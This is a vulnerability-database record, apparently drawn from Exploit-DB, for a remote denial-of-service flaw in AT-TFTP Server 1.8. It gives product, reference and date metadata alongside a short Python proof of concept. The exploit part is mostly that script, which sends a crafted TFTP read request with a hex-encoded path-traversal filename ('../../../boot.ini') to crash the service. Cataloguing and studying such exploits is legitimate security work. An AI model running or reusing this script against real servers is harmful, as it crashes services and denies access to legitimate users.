ID
VAR-E-201104-0170
EDB ID
35654
TITLE
AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service - Windows dos Exploit
Trust: 0.6
DESCRIPTION
AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service.. dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | at tftp | model: | server | scope: | eq | version: | 1.8 | Trust: 1.6 |
vendor: | allied | model: | telesis at-tftp server | scope: | eq | version: | 1.8 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/47561/info
AT-TFTP is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
AT-TFTP 1.8 is affected; other versions may also be vulnerable.
#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
# http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################
import socket
import sys
host = '127.0.0.1'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
addr = (host,port)1
data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'Read' Request Remote Denial of Service
Trust: 1.0
CREDITS
Antu Sanadi
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 35654 | Trust: 1.9 |
db: | BID | id: | 47561 | Trust: 1.9 |
db: | EDBNET | id: | 56814 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/47561/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/35654/ | Trust: 0.6 |
url: | http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/35654 | Trust: 0.3 |
SOURCES
db: | BID | id: | 47561 |
db: | EXPLOIT-DB | id: | 35654 |
db: | EDBNET | id: | 56814 |
LAST UPDATE DATE
2022-07-27T09:59:09.577000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 47561 | date: | 2011-04-25T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 47561 | date: | 2011-04-25T00:00:00 |
db: | EXPLOIT-DB | id: | 35654 | date: | 2011-04-25T00:00:00 |
db: | EDBNET | id: | 56814 | date: | 2011-04-25T00:00:00 |